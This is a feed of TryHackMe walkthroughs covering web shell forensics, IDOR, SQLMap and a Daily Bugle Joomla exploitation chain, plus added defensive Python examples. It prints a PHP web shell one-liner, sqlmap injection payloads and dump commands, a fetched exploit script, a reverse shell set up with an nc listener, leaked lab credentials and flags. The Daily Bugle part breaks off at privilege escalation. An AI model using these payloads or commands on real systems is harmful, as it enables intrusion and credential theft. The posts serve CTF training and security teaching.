#tryhackme-walkthrough
Cyber Kill Chain | Tryhackme Explore the Cyber Kill Chain by Lockheed Martin. Continue reading on System Weakness »

#tryhackme-walkthrough #cyber-kill-chain #tryhackme-writeup #cybersecurity #tryhackme

Cyber Kill Chain | Tryhackme
Explore the Cyber Kill Chain by Lockheed Martin.
systemweakness.com
June 26, 2025 at 10:33 AM
Brains —  TryHackMe Walkthrough

infosecwriteups.com
September 28, 2025 at 7:25 AM
Introduction to EDR TryHackMe | * Motion Graphics * | Beginner Friendly | Sunny Singh Verma Introduction to EDR TryHackMe Detailed Writeup Image Source : TryHackMe Kudos to the Creators of this r...

#tryhackme-walkthrough #introduction-to-edr #introduction-to-edr-thm #cybersecurity #tryhackme […]
Original post on infosecwriteups.com
infosecwriteups.com
August 31, 2025 at 11:13 AM
TryHackMe Infinity Shell Walkthrough: Web Shell Forensics & CTF Guide
Introduction

In the TryHackMe Infinity Shell room, I tackled a web application forensics challenge focused on detecting a malicious PHP web shell on a CMS site. This walkthrough covers discovering the shell, decoding Base64 commands, and extracting the CTF flag, while demonstrating how attackers hide files in directories like img/ or uploads/ for remote code execution. Perfect for beginners learning web security or CTF enthusiasts sharpening forensic skills.

Identifying the Web Application & Finding the Malicious Web Shell

I started this challenge by looking for a web application on the box — the usual first step in web application forensics and TryHackMe CTFs. From the web root I found a CMS project that looked promising:

cd /var/www/html/
ls

Seeing CMSsite-master told me this was a CMS-based site (common attack surface), so I dove into that directory.

cd CMSsite-master
ls -la

Hunting for suspicious files

Attackers commonly hide web shells in places that look innocuous — img/, uploads/, includes/, etc. I listed the img/ directory and found a tiny images.php file next to normal image files:

cd img/
ls -la

When I examined images.php it was immediately suspicious:

cat images.php
<?php system(base64_decode($_GET['query'])); ?>

This single line is a classic web shell pattern: it accepts base64-encoded commands via a query parameter and executes them on the server. That’s the attacker’s entry point — a direct remote command execution vector. At this point I knew I had to trace how the shell was used and what commands the attacker ran.

Extracting web shell usage from Apache logs

I filtered the Apache access logs for requests to images.php to get a clear timeline of what the attacker ran through the web shell. Instead of reading every line by hand, I searched for requests containing images.php? and pulled the Base64 payloads that were passed in the query parameter. That gave me a concise list of encoded commands to decode and analyse.

cd /var/log/apache2/
cat other_vhosts_access.log.1 | grep -r 'images.php?'

The Apache logs contained several GET requests targeting images.php, each passing Base64-encoded commands in the query parameter.

GET /CMSsite-master/img/images.php?query=ZWNobyAnVEhNe3...ScK HTTP/1.1

Decoding the commands

I decoded each Base64 string to reveal the actual shell commands the attacker executed. Here are the results:

d2hvYW1pCg==
bHMK
ZWNobyAnVEhNe3N1cDNyXzM0c3lfdzNic2gzbGx9Jwo=
aWZjb25maWcK
Y2F0IC9ldGMvcGFzc3dkCg==
aWQK

What is the flag?
THM{sup3r_34sy_w3bsh3ll}

Conclusion

The Infinity Shell room on TryHackMe provided a hands-on experience in web application forensics and web shell analysis. By carefully inspecting the CMS directories, identifying the malicious images.php web shell, and decoding Base64 commands from Apache logs, I was able to reconstruct the attacker’s actions and retrieve the CTF flag: THM{sup3r_34sy_w3bsh3ll}. This challenge highlights the importance of monitoring web directories for suspicious files, analyzing server logs for unusual activity, and understanding how attackers leverage hidden web shells for remote code execution. Whether you are new to CTFs or looking to sharpen your web forensics and penetration testing skills, this room reinforces critical skills for identifying and mitigating web-based attacks.

TryHackMe Infinity Shell Walkthrough: Web Shell Forensics & CTF Guide was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
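The log step above (grep for images.php?, pull the query value, decode it) can be automated so that the whole timeline is recovered in one pass. The Python below is an added example and is not part of the original write-up: it parses Apache vhost_combined log lines (the sample lines are constructed, with invented client IPs, timestamps and user agents; the Base64 values are the ones listed in the write-up, one of them percent-encoded the way a browser sends "="), keeps only requests to images.php, decodes the query parameter, keeps undecodable values in the timeline rather than dropping them, and extracts any THM{...} flag from the decoded commands. The regex, function names and shell_path/param defaults are this example's own assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample of /var/log/apache2/other_vhosts_access.log.1 lines
# (vhost_combined format). IPs, times and user agents are invented; the
# Base64 payloads are the ones from the write-up.
SAMPLE_LOG = """\
cms.thm:80 10.10.14.7 - - [12/Mar/2025:09:14:01 +0000] "GET /CMSsite-master/img/images.php?query=d2hvYW1pCg%3D%3D HTTP/1.1" 200 512 "-" "curl/7.88.1"
cms.thm:80 10.10.14.7 - - [12/Mar/2025:09:14:05 +0000] "GET /CMSsite-master/img/images.php?query=bHMK HTTP/1.1" 200 801 "-" "curl/7.88.1"
cms.thm:80 10.10.14.7 - - [12/Mar/2025:09:14:09 +0000] "GET /CMSsite-master/img/images.php?query=ZWNobyAnVEhNe3N1cDNyXzM0c3lfdzNic2gzbGx9Jwo= HTTP/1.1" 200 30 "-" "curl/7.88.1"
cms.thm:80 10.10.14.7 - - [12/Mar/2025:09:14:12 +0000] "GET /CMSsite-master/img/images.php?query=aWZjb25maWcK HTTP/1.1" 200 1203 "-" "curl/7.88.1"
cms.thm:80 10.10.14.7 - - [12/Mar/2025:09:14:15 +0000] "GET /CMSsite-master/img/images.php?query=Y2F0IC9ldGMvcGFzc3dkCg== HTTP/1.1" 200 2190 "-" "curl/7.88.1"
cms.thm:80 10.10.14.7 - - [12/Mar/2025:09:14:18 +0000] "GET /CMSsite-master/img/images.php?query=aWQK HTTP/1.1" 200 44 "-" "curl/7.88.1"
cms.thm:80 10.10.14.7 - - [12/Mar/2025:09:14:21 +0000] "GET /CMSsite-master/img/images.php?query=not%20base64 HTTP/1.1" 500 0 "-" "curl/7.88.1"
cms.thm:80 10.10.14.22 - - [12/Mar/2025:09:15:00 +0000] "GET /CMSsite-master/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# vhost_combined: vhost:port client ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
FLAG_RE = re.compile(r"THM\{[^}]+\}")


def decode_payload(value: str):
    """Decode one Base64 parameter value, or return None if it is not
    valid Base64 (validate=True rejects stray characters instead of
    silently skipping them, so a garbage value is not mis-decoded)."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8").rstrip("\n")
    except (binascii.Error, ValueError):
        return None


def extract_webshell_commands(log_text: str, shell_path: str = "images.php", param: str = "query"):
    """Return (timestamp, source_ip, raw_value, decoded_command) for every
    request that hit the web shell, in log order. Values that do not decode
    are kept with decoded_command=None so the timeline stays complete."""
    rows = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("target"))
        if url.path.rsplit("/", 1)[-1] != shell_path:
            continue
        # parse_qs percent-decodes the value (and maps '+' to a space,
        # which is also what PHP does when it builds $_GET)
        for value in parse_qs(url.query).get(param, []):
            rows.append((m.group("ts"), m.group("ip"), value, decode_payload(value)))
    return rows


def find_flags(rows):
    """Collect every THM{...} token echoed through the shell."""
    flags = []
    for _ts, _ip, _raw, cmd in rows:
        if cmd:
            flags.extend(FLAG_RE.findall(cmd))
    return flags


if __name__ == "__main__":
    timeline = extract_webshell_commands(SAMPLE_LOG)
    for ts, ip, raw, cmd in timeline:
        print(f"{ts}  {ip}  {raw:45}  -> {cmd if cmd is not None else '<not base64>'}")
    print("flags:", find_flags(timeline))
```

Pointing the same functions at a real log is a matter of reading the file into log_text; requests from any other client IP to the shell would show up as a second source in the timeline, which is the first thing to check when deciding whether one attacker or several used the shell.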
infosecwriteups.com
October 4, 2025 at 11:44 AM
Advent of Cyber 2024 [ Day 4] Writeup with Answers | TryHackMe Walkthrough
I’m all atomic inside!
infosecwriteups.com
December 6, 2024 at 10:02 AM
Struggling with privilege escalation?

 In this TryHackMe walkthrough, Darryn Brownfield explores Ollie, a box with an "easy" rating but some tricky steps.

Watch to learn reconnaissance, exploiting known vulnerabilities, and privilege escalation 👇
www.youtube.com
March 23, 2025 at 9:53 AM
Wireshark: Traffic Analysis | TryHackMe — Walkthrough — Part 1 Wireshark: Traffic Analysis| TryHackMe — Walkthrough— Part 1 In this room, we will learn the basics of traffic an...

#cybersecurity #tryhackme #wireshark #soc-analyst #tryhackme-walkthrough

Wireshark: Traffic Analysis | TryHackMe — Walkthrough — Part 1
This beginner-to-intermediate level guide provides hands-on experience with Wireshark’s core features.
systemweakness.com
July 28, 2025 at 11:41 AM
Surviving the Nightmare: My Biohazard CTF Adventure 🔬 Hey! I’m Adwaith , an aspiring offensive security enthusiast, and I’m thrilled to share my walkthrough of the Biohazard CTF on TryHackMe...

#ethical-hacking #tryhackme #cybersecurity #tryhackme-walkthrough #tryhackme-writeup

Original post on infosecwriteups.com
infosecwriteups.com
September 6, 2025 at 5:48 AM
IDOR — TryHackMe Walkthrough
IDOR — TryHackMe Walkthrough

In this room, you’re going to learn what an IDOR vulnerability is, what they look like, how to find them and a practical task exploiting a real case scenario.

Lab Access: https://tryhackme.com/room/idor

Task 1: What is an IDOR?

IDOR stands for Insecure Direct Object Reference and is a type of access control vulnerability. This type of vulnerability can occur when a web server receives user-supplied input to retrieve objects (files, data, documents), too much trust has been placed on the input data, and it is not validated on the server-side to confirm the requested object belongs to the user requesting it.

[Question 1.1] What does IDOR stand for?
Answer: Insecure Direct Object Reference

Task 2: An IDOR Example

Imagine you’ve just signed up for an online service, and you want to change your profile information. The link you click on goes to http://online-service.thm/profile?user_id=1305, and you can see your information. Curiosity gets the better of you, and you try changing the user_id value to 1000 instead (http://online-service.thm/profile?user_id=1000), and to your surprise, you can now see another user’s information. You’ve now discovered an IDOR vulnerability! Ideally, there should be a check on the website to confirm that the user information belongs to the logged-in user requesting it.

Using what you’ve learnt above, click on the View Site button and try to receive a flag by discovering and exploiting an IDOR vulnerability.

[Question 2.1] What is the Flag from the IDOR example website?
Answer: THM{IDOR-VULN-FOUND}

Task 3: Finding IDORs in Encoded IDs

Encoded IDs
When passing data from page to page either by post data, query strings, or cookies, web developers will often first take the raw data and encode it. Encoding ensures that the receiving web server will be able to understand the contents. Encoding changes binary data into an ASCII string, commonly using the characters a-z, A-Z, 0-9, and = for padding.

The most common encoding technique on the web is base64 encoding and can usually be pretty easy to spot. You can use websites like https://www.base64decode.org/ to decode the string, then edit the data and re-encode it again using https://www.base64encode.org/ and then resubmit the web request to see if there is a change in the response.

[Question 3.1] What is a common type of encoding used by websites?
Answer: Base64

Task 4: Finding IDORs in Hashed IDs

Hashed IDs
Hashed IDs are a little bit more complicated to deal with than encoded ones, but they may follow a predictable pattern, such as being the hashed version of the integer value. For example, the Id number 123 would become 202cb962ac59075b964b07152d234b70 if md5 hashing were in use. It’s worthwhile putting any discovered hashes through a web service such as https://crackstation.net/ (which has a database of billions of hash to value results) to see if we can find any matches.

[Question 4.1] What is a common algorithm used for hashing IDs?
Answer: md5

Task 5: Finding IDORs in Unpredictable IDs

Unpredictable IDs
If the Id cannot be detected using the above methods, an excellent method of IDOR detection is to create two accounts and swap the Id numbers between them. If you can view the other users’ content using their Id number while still being logged in with a different account (or not logged in at all), you’ve found a valid IDOR vulnerability.

[Question 5.1] What is the minimum number of accounts you need to create to check for IDORs between accounts?
Answer: 2

Task 6: Where are IDORs located?

Where are they located?
The vulnerable endpoint you’re targeting may not always be something you see in the address bar. It could be content your browser loads in via an AJAX request or something that you find referenced in a JavaScript file. Sometimes endpoints could have an unreferenced parameter that may have been of some use during development and got pushed to production.

For example, you may notice a call to /user/details displaying your user information (authenticated through your session). But through an attack known as parameter mining, you discover a parameter called user_id that you can use to display other users’ information, for example, /user/details?user_id=123.

Potential located areas:
Address Bar
An AJAX request loads content into your browser.
Something that is written in a JavaScript file
An unreferenced parameter that may have been useful during testing but was pushed to production

[Question 6.1] Read the above.

Task 7: A Practical IDOR Example

https://10-10-15-165.p.thmlabs.com

Firstly you’ll need to log in. To do this, click on the customer’s section and create an account. Once logged in, click on the Your Account tab. The Your Account section gives you the ability to change your information such as username, email address and password. You’ll notice the username and email fields pre-filled in with your information. We’ll start by investigating how this information gets pre-filled. If you open your browser developer tools, select the network tab and then refresh the page, you’ll see a call to an endpoint with the path /api/v1/customer?id={user_id}. This page returns in JSON format your user id, username and email address. We can see from the path that the user information shown is taken from the query string’s id parameter (see below image).

First off — Set up an account to simulate having a customer account with “Acme IT Support.”

Next — Go to “Your Account” and observe that all of the information has already been provided beforehand, which is something to take note of because it makes us curious how and what mechanism has provided all of this information.

Then, if you’re using Firefox, “Right Click” and select “Inspect.” Go to the “Network” section and you’ll discover that it’s empty because the page needs to be refreshed in order to retrieve the information. After refreshing the page, all of this information will appear, and it is useful to understand how all of this information is retrieved by looking at the “File” column. Having discovered that “customer/?id=51” appears to be the one we are looking for, and by hovering the cursor over it, we will be able to read the complete string of it in order to understand what the endpoint actually does, and so on. Now that we’ve seen this, we can open it in a new tab.

[Question 7.1] What is the username for user id 1?
Change the value of the new request to “1,” and note that the results of the username and email have been altered.
Answer: adam84

[Question 7.2] What is the email address for user id 3?
Again, change the value to 3 and note that the results of the username and email have been altered.
Answer: j@fakemail.thm

CONCLUSION

The IDOR room is a great way to learn how ID numbers can be easily changed, leading to a serious security risk. Many companies and individuals may not even realize they are vulnerable to such attacks. Even though developers should have fixed this issue, human error can leave systems exposed, allowing attackers to exploit them. In reality, this is likely one of the common techniques attackers use.

Happy Hacking!🚀💻

IDOR — TryHackMe Walkthrough was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
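The missing server-side check that Task 1 describes, and the /api/v1/customer?id={user_id} lookup from Task 7, can be shown as code. The Python below is an added example, not the room's backend and not part of the write-up: it models the customer table in memory (ids 1 and 3 reuse the answers above, adam84 and j@fakemail.thm; every other value is constructed), contrasts the vulnerable lookup with one that verifies ownership against the session, shows the stricter variant that takes no client-supplied id at all, and demonstrates with the md5 example from Task 4 that hashing the id does not replace the check. Class, function and endpoint names are this example's own.

```python
import hashlib
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Customer:
    id: int
    username: str
    email: str


# Constructed sample table. Ids 1 and 3 reuse the write-up's answers
# (adam84, j@fakemail.thm); the remaining values are invented.
CUSTOMERS = {
    1: Customer(1, "adam84", "adam84@fakemail.thm"),
    3: Customer(3, "user3", "j@fakemail.thm"),
    51: Customer(51, "testuser", "testuser@fakemail.thm"),
}


class Forbidden(Exception):
    """Raised when the caller asks for an object that is not theirs."""


def customer_lookup_vulnerable(session_user_id: int, requested_id: int) -> Optional[Customer]:
    """Task 7 behaviour: the id from the query string is trusted as-is, so
    any logged-in user (51 here) can read record 1 or 3."""
    return CUSTOMERS.get(requested_id)


def customer_lookup_fixed(session_user_id: int, requested_id: int) -> Optional[Customer]:
    """Server-side ownership check: the record must belong to the user the
    session identifies. Raising (HTTP 403 in a real handler) keeps the
    denied attempt visible to logging, which is what you want to alert on."""
    record = CUSTOMERS.get(requested_id)
    if record is None:
        return None
    if record.id != session_user_id:
        raise Forbidden(f"user {session_user_id} may not read customer {requested_id}")
    return record


def customer_lookup_session_only(session_user_id: int) -> Optional[Customer]:
    """Stricter fix: accept no id from the client at all; the session already
    says whose profile to return, so there is nothing to tamper with."""
    return CUSTOMERS.get(session_user_id)


def hashed_id(n: int) -> str:
    """Task 4: md5 of the integer id. It hides the number but stays
    predictable (123 -> 202cb962ac59075b964b07152d234b70) and is not an
    access-control decision."""
    return hashlib.md5(str(n).encode()).hexdigest()


def customer_lookup_by_hash_vulnerable(session_user_id: int, requested_hash: str) -> Optional[Customer]:
    """Hashing the reference changes nothing while the ownership check is
    still missing: whoever can compute md5("3") reads record 3."""
    for record in CUSTOMERS.values():
        if hashed_id(record.id) == requested_hash:
            return record
    return None


if __name__ == "__main__":
    me = 51  # the id the session belongs to
    print("vulnerable, id=1 :", customer_lookup_vulnerable(me, 1))
    try:
        customer_lookup_fixed(me, 1)
    except Forbidden as exc:
        print("fixed, id=1      :", exc)
    print("fixed, own id    :", customer_lookup_fixed(me, me))
    print("session only     :", customer_lookup_session_only(me))
    print("hashed id=3      :", customer_lookup_by_hash_vulnerable(me, hashed_id(3)))
```

The two-account test from Task 5 maps directly onto customer_lookup_fixed: log in as 51, request 1, and the only acceptable outcome is a 403 (or a 404 if you prefer not to confirm that id 1 exists).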
infosecwriteups.com
September 10, 2025 at 5:55 AM
I like TryHackMe better because I think the whole experience is better. As for the training I think you will find TryHackMe has a little more handholding than HTB. But it is always best to only go to the walkthrough when you are stuck and only long enough to get you unstuck.
December 4, 2024 at 4:42 PM
Basic Pentesting Walkthrough: Solving the TryHackMe Lab infosecwriteups.com/basic-pentes...
September 17, 2025 at 8:37 AM
SQLMap: The Basics [ Cyber Security 101 ] TryHackMe Writeup | Detailed Walkthrough | THM Premium…
SQLMap: The Basics [ Cyber Security 101 ] TryHackMe Writeup | Detailed Walkthrough | THM Premium Room | SuNnY

Kudos To the Creators of this Room 😎

Room Type: Only subscribers can deploy virtual machines in this room! Go to your profile page to subscribe (if you have not already).
Do note: a Premium Subscription is required to solve this room.

Let’s Start the Party

This writeup is a part of TryHackMe’s Learning Path → Cyber Security 101
Check this Learning Path here → Cyber Security 101 Learning Path

Task 1: Introduction

It’s advised to give this module a good read before proceeding to Task 2. Let’s proceed to Task 2.

Task 2: SQL Injection Vulnerability

Task 2 — Question 1: Which boolean operator checks if at least one side of the operator is true for the condition to be true?

The boolean operator that checks if at least one side of the condition is true for the entire condition to be true is the OR operator. In a SQL query, the OR operator ensures that if either the condition on the left side or the condition on the right side is true, the whole statement evaluates to true.

Task 2 — Question 2: Is 1=1 in an SQL query always true? (YEA/NAY)

The Answer is YEA. In an SQL query, 1=1 is always true. In SQL, the condition 1=1 is a logical expression that always evaluates to true because 1 is always equal to 1. This is often used in SQL queries, particularly in SQL injection attacks, to bypass conditions or create queries that will always return results.

Task 2 Complete!

Task 3: Automated SQL Injection Tool

Task 3 Question 1: Which flag in the SQLMap tool is used to extract all the databases available?

--dbs

Explanation: The --dbs flag in SQLMap is used to list all the databases present in the backend database management system (DBMS). After identifying an SQL injection vulnerability, this flag tells SQLMap to extract and display all the available database names. Once the database names are known, an attacker can further enumerate them to access sensitive information.

Task 3 Question 2: What would be the full command of SQLMap for extracting all tables from the “members” database? (Vulnerable URL: http://sqlmaptesting.thm/search/cat=1)

sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D members --tables

Explanation: To extract all tables from a specific database using SQLMap, the -D flag is used to specify the database name, and the --tables flag is used to list all tables in that database.

Task 3 Complete!

Task 4: Practical Exercise

This is a Practical Module, let’s fire up the VM 🔥 before proceeding (Start Machine). The Room recommends Starting AttackBox.

Finding the Target URL (Quick Motion Based Solution)

1. Let’s open the browser and navigate to this page → http://10.10.249.16/ai/login
2. We are greeted with a Login Page as shown above 👆🏾
3. Right-click on the page and select Inspect (or press Ctrl + Shift + I / Cmd + Option + I on Mac).
4. In the developer tools, navigate to the Network tab.
5. To capture the GET request from the browser, let’s use test as Username and test as Password → test:test (This is also used and demonstrated in the Module of this room)
6. Then refresh the Network tab and we will get the GET Request
7. We can copy this URL to solve further Questions in this Task

Steps Performed in a Video Snippet →

So we have our Target URI with us → http://10.10.249.16/ai/includes/user_login?email=test&password=test

Do Note → Your IP can be different than the IP I have got in this Room. Just replace the IP holder with yours.

Let’s now Answer the Questions →

Task 4 Question 1: How many databases are available in this web application?

Using our target URL, let’s find the answer by running the SQLMap command to list all the databases using the --dbs flag. The output will show the number of databases available in the application.

sqlmap -u "http://10.10.249.16/ai/includes/user_login?email=test&password=test" --dbs --level=5

Note → Don’t forget to wrap the URL inside " ", otherwise the flag --dbs gets ignored and an error is returned.

After executing the command, SQLMap will output a list of databases. The correct answer can be inferred from this output. Now the Motion Graphics Image with Command and result →

Answer is 6

available databases [6]:
[*] ai
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

Task 4 — Question 2: What is the name of the table available in the “ai” database?

Using the same Target URI we are going to solve this question → After identifying the available databases, use the SQLMap command with the -D ai --tables flags to fetch the tables from the "ai" database.

sqlmap -u "http://10.10.249.16/ai/includes/user_login?email=test&password=test" -D ai --tables --level=5

Note → Again, don’t forget to wrap the URL inside " ".

SQLMap will list the tables in the specified database → Now with the Motion Graphics →

Answer to Task 4 Question 2 is → Users

Task 4 Question 3: What is the password of the email test@chatai.com?

Using the same Target URI as the above questions we are going to solve this final question as well! After you know the table name (in this case, “user”), use the SQLMap command to dump the records from that table, specifying the database and table. The output will contain the records in the table, including the password for test@chatai.com. Look for the entry associated with this email to find the corresponding password.

sqlmap -u "http://10.10.249.16/ai/includes/user_login?email=test&password=test" -D ai -T user --dump --level=5

Note → Again, as always, don’t forget to wrap the URL inside " " to avoid errors. Now with the Motion Graphics to understand better →

Task 4 and the Room => Done!

Congrats! We have now solved all the tasks of this room! Hope you have enjoyed solving this room as much as I did. If you want to get the latest TryHackMe writeups delivered, go ahead and follow me on Medium and also hit the notify via email.

Let’s Connect on LinkedIn → https://linkedin.com/in/sunnysinghverma
You can also add me Respect on Hack The Box if you want, I would really appreciate it :) https://app.hackthebox.com/users/1585635
My TryHackMe Profile Page → https://tryhackme.com/p/SuNnY

If you did, you can add a clap to this article to let me know, and if you loved this article you can click the clap icon up to 50 times to let me know, and that will make my day 🤗 You can also follow me on Medium to get more articles about CTFs and Cybersecurity in the near future, but don’t forget to hit that email notification icon right next to the follow me button. Thank you! SuNnY

SQLMap: The Basics [ Cyber Security 101 ] TryHackMe Writeup | Detailed Walkthrough | THM Premium… was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
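Task 2 explains why OR and 1=1 matter, and Task 4 runs sqlmap against a login endpoint that takes email and password from the query string. The Python below is an added example and is not part of the write-up or of the room: it builds an in-memory SQLite table (the email test@chatai.com is the one from Task 4, the passwords are constructed), writes the login query the way a vulnerable application does (string concatenation) and the way it should be written (bound parameters), and shows that the 1=1 tautology from Task 2 selects every row in the first case and nothing in the second. Table and column names are this example's own assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory 'user' table with constructed rows. Passwords are kept in
    clear here only to keep the example short; a real table stores hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO user (email, password) VALUES (?, ?)",
        [("test@chatai.com", "constructed-password-1"),
         ("admin@chatai.com", "constructed-password-2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str):
    """User input is spliced into the SQL text. A quote in the input closes
    the string literal early and whatever follows becomes SQL, which is the
    structure sqlmap's --level/--risk payloads probe for. Returns the
    matching emails."""
    sql = f"SELECT email FROM user WHERE email = '{email}' AND password = '{password}'"
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, email: str, password: str):
    """Same query with bound parameters. The driver passes the values
    separately from the statement text, so "' OR 1=1 --" is compared as a
    password string and matches no row."""
    sql = "SELECT email FROM user WHERE email = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (email, password))]


# Task 2 in one string: 1=1 is always true and OR needs only one true side,
# and the trailing -- comments out the closing quote of the original query.
TAUTOLOGY = "' OR 1=1 --"


if __name__ == "__main__":
    conn = make_db()
    print("concatenated :", login_vulnerable(conn, "nobody", TAUTOLOGY))
    print("parameterised:", login_safe(conn, "nobody", TAUTOLOGY))
    print("legitimate   :", login_safe(conn, "test@chatai.com", "constructed-password-1"))
```

The query the vulnerable function ends up executing with the tautology is SELECT email FROM user WHERE email = 'nobody' AND password = '' OR 1=1 --', and because AND binds tighter than OR the WHERE clause is true for every row. Parameterising the statement is the fix; the -D/-T/--dump run in Task 4 succeeds only against the first form.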
infosecwriteups.com
January 11, 2025 at 6:25 AM
March 14, 2025 at 9:07 PM
Daily Bugle — TryHackMe Walkthrough: Joomla Exploitation & Red Hat Privilege Escalation
Daily Bugle — TryHackMe Walkthrough (Joomla Exploitation & Privilege Escalation Guide)

Introduction

The Daily Bugle room on TryHackMe plunges you into a thrilling Red Team scenario centered around a high-profile bank heist. Your mission is to investigate and uncover the culprits while navigating a mix of web and system challenges. This room combines Joomla web exploitation, SQL injection, and Red Hat Linux privilege escalation, providing a full-spectrum test of both web application and server-level hacking skills. It’s a perfect exercise for penetration testers looking to sharpen their reconnaissance, exploitation, and privilege escalation techniques in a realistic, hands-on environment.

Initial reconnaissance

I started the box with a standard port and service scan to get my bearings.

nmap -sV -sC <ip>

Nmap returned three open ports:
22/tcp — SSH (OpenSSH 7.4)
80/tcp — HTTP (Apache/2.4.6, PHP 5.6.40) — the web server identified itself as Joomla!.
3306/tcp — MySQL / MariaDB (unauthorized)

Port 80 was open, so I navigated to the web server to see what was exposed.

Question: Access the web server, who robbed the bank?
Answer: spiderman

Web enumeration

Next, I ran a directory brute-force with dirsearch to map out potential Joomla paths and locate an admin panel.

dirsearch -u <ip> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Output highlights showed multiple Joomla-related directories and, importantly, an administrator interface:
/images/, /media/, /templates/, /modules/, /plugins/, /includes/, /language/, /components/, /cache/, /libraries/, /tmp/, /layouts/, /cli/
/administrator/ — Joomla admin panel discovered

Let’s navigate to the administrator panel next.

Finding Joomla Version

While dirsearch was running I noticed a README.txt file and grabbed it with curl to see if it revealed anything useful.

curl -s http://<ip>/README.txt

It confirmed the site was running Joomla 3.7.0, which is useful for targeting known vulnerabilities.

Question: What is the Joomla version?
Answer: 3.7.0

This is a useful data point: older Joomla 3.7.x installs are known to have several vulnerabilities, so next I moved on to vulnerability research.

Vulnerability research — SQL Injection

A known SQL injection (Exploit-DB 42033) affects Joomla 3.7’s com_fields component via the list[fullordering] parameter. I used sqlmap to verify the vulnerability and enumerate databases:

sqlmap -u "http://10.201.99.224/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" \
  --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Output:

sqlmap identified the following injection point(s) with a total of 2547 HTTP(s) requests:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 3813 FROM(SELECT COUNT(*),CONCAT(0x7162767671,(SELECT (ELT(3813=3813,1))),0x716b767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 7977 FROM (SELECT(SLEEP(5)))ODsF)
---
[09:31:02] [INFO] the back-end DBMS is MySQL
[09:31:02] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:31:03] [INFO] fetching database names
[09:31:03] [INFO] retrieved: 'information_schema'
[09:31:03] [INFO] retrieved: 'joomla'
[09:31:03] [INFO] retrieved: 'mysql'
[09:31:03] [INFO] retrieved: 'performance_schema'
[09:31:04] [INFO] retrieved: 'test'
available databases [5]:
[*] information_schema
[*] joomla
[*] mysql
[*] performance_schema
[*] test

[09:31:04] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2507 times
[09:31:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.201.99.224'
[09:31:04] [WARNING] you haven't updated sqlmap for more than 1997 days!!!

[*] ending @ 09:31:04 /2025-09-21/

sqlmap confirmed the parameter was vulnerable and retrieved the following databases: information_schema, joomla, mysql, performance_schema, test. The backend DBMS is MySQL (MariaDB fork). Many HTTP 500 responses appeared — typical for error-based payloads — and results were logged for further use.

Exploit & admin hash extraction

I found an existing Joomla exploit and downloaded it:

wget https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py
python joomblah.py http://10.201.99.224/

This revealed Jonah’s password hash:

$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

I cracked it with John the Ripper using the RockYou wordlist:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Question: What is Jonah's cracked password?
Answer: spiderman123

Gaining Access — Joomla Admin & Reverse Shell

I logged in to the Joomla admin panel using Jonah’s credentials (jonah:spiderman123) via the /administrator directory. Once inside, I navigated to Extensions > Templates > Templates and selected the Beez3 template.

To get a reverse shell, I cloned the PentestMonkey PHP reverse shell repository:

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cd php-reverse-shell

I started a listener on my machine:

nc -lnvp 1234

Then I opened index.php in the Beez3 template, replaced its content with the PHP reverse shell (configured with my IP and port), and saved it. Browsing to the modified template triggered the reverse shell:

curl http://10.201.99.224/templates/beez3/index.php

And my listener received the connection:

~$ nc -lnvp 1234
Connection received on 10.201.99.224 43182
sh-4.2$

I was now on the server as the apache user.

Post-Exploitation

First, I listed /home to see which users existed. The only user present was jjameson, but I didn’t have permission to access their home directory, so user.txt couldn’t be read at this stage.

Next, I inspected the web directory:

cd /var/www/html
cat configuration.php

The Joomla configuration.php file revealed database credentials:

public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
public $dbprefix = 'fb9j5_';

Capturing the User Flag

Interestingly, the database password (nv5uz9r3ZEDzVjNu) also worked for the user jjameson. I logged in via SSH:

ssh jjameson@10.201.99.224
Password: nv5uz9r3ZEDzVjNu

Once inside, I retrieved the user flag:

cat user.txt
27a260fe3cba712cfdedb1c86d80442e

The machine is a Red Hat-based system.

Post-Exploitation — Privilege Escalation

I checked sudo privileges:

sudo -l

Output revealed that jjameson can run yum as root without a password:

